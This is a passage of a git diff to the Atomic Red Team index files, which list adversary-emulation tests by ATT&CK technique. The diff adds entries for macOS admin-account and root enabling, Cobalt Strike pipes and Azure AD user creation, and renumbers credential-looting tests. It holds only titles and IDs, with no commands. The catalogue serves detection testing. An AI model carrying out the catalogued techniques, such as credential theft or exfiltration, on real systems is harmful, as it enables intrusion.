 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
@@ -63,6 +64,9 @@ defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
@@ -101,6 +105,9 @@ persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,
 persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
 persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
@@ -128,6 +135,9 @@ privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Appl
 privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
@@ -203,6 +213,9 @@ execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a5
 execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 327bf004..c548ca6a 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -330,8 +330,8 @@ defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,2,Wi
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -466,8 +466,8 @@ privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -534,6 +534,11 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
+execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
+execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
+execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
+execution,T1559,Inter-Process Communication,4,Cobalt Strike post-exploitation pipe (4.2 and later),7a48f482-246f-4aeb-9837-21c271ebf244,command_prompt
+execution,T1559,Inter-Process Communication,5,Cobalt Strike post-exploitation pipe (before 4.2),8dbfc15c-527b-4ab0-a272-019f469d367f,command_prompt
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
@@ -660,8 +665,8 @@ persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify R
 persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-persistence,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-persistence,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -831,6 +836,7 @@ discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
 discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
 discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
+discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
@@ -1061,8 +1067,8 @@ initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Sour
 initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/azure-ad-index.md b/atomics/Indexes/Indexes-Markdown/azure-ad-index.md
index c3d625a9..c6e98f89 100644
--- a/atomics/Indexes/Indexes-Markdown/azure-ad-index.md
+++ b/atomics/Indexes/Indexes-Markdown/azure-ad-index.md
@@ -59,7 +59,9 @@
 - [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
   - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
   - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
-- T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
+  - Atomic Test #2: Azure AD - Create a new user [azure-ad]
+  - Atomic Test #3: Azure AD - Create a new user via Azure CLI [azure-ad]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #4: Azure AD - adding user to Azure AD role [azure-ad]
   - Atomic Test #5: Azure AD - adding service principal to Azure AD role [azure-ad]
diff --git a/atomics/Indexes/Indexes-Markdown/iaas-index.md b/atomics/Indexes/Indexes-Markdown/iaas-index.md
index 1cbf4ba9..e6150665 100644
--- a/atomics/Indexes/Indexes-Markdown/iaas-index.md
+++ b/atomics/Indexes/Indexes-Markdown/iaas-index.md
@@ -22,6 +22,7 @@
 - T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 
 # credential-access
 - T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -94,6 +95,7 @@
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 
 # collection
 - T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -112,6 +114,7 @@
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 
 # lateral-movement
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -122,6 +125,7 @@
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 
 # execution
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 8a0631ba..459ac7ee 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -171,6 +171,7 @@
   - Atomic Test #4: Base64 decoding with Perl [linux, macos]
   - Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
   - Atomic Test #6: Hex decoding with shell utilities [linux, macos]
+  - Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
 - [T1562 Impair Defenses](../../T1562/T1562.md)
   - Atomic Test #1: Windows Disable LSA Protection [windows]
 - [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
@@ -642,6 +643,7 @@
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.004 Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md)
   - Atomic Test #1: Alternate Data Streams (ADS) [windows]
@@ -663,8 +665,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
   - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -971,6 +976,7 @@
   - Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
@@ -983,8 +989,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1116,7 +1125,12 @@
   - Atomic Test #9: Obfuscated command line scripts [linux]
   - Atomic Test #10: Change login shell [linux]
   - Atomic Test #11: Environment variable scripts [linux]
-- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1559 Inter-Process Communication](../../T1559/T1559.md)
+  - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
+  - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
+  - Atomic Test #3: Cobalt Strike SSH (postex_ssh) pipe [windows]
+  - Atomic Test #4: Cobalt Strike post-exploitation pipe (4.2 and later) [windows]
+  - Atomic Test #5: Cobalt Strike post-exploitation pipe (before 4.2) [windows]
 - T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1370,6 +1384,8 @@
   - Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
 - [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
   - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
+  - Atomic Test #2: Azure AD - Create a new user [azure-ad]
+  - Atomic Test #3: Azure AD - Create a new user via Azure CLI [azure-ad]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
   - Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -1474,6 +1490,7 @@
   - Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
@@ -1486,8 +1503,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1887,6 +1907,7 @@
   - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
   - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
   - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
+  - Atomic Test #6: System Discovery - SocGholish whoami [windows]
 - [T1613 Container and Resource Discovery](../../T1613/T1613.md)
   - Atomic Test #1: Container and ResourceDiscovery [containers]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2006,7 +2027,8 @@
   - Atomic Test #1: List Process Main Windows - C# .NET [windows]
 - T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md)
+  - Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos]
 - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
   - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
   - Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
@@ -2442,12 +2464,16 @@
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
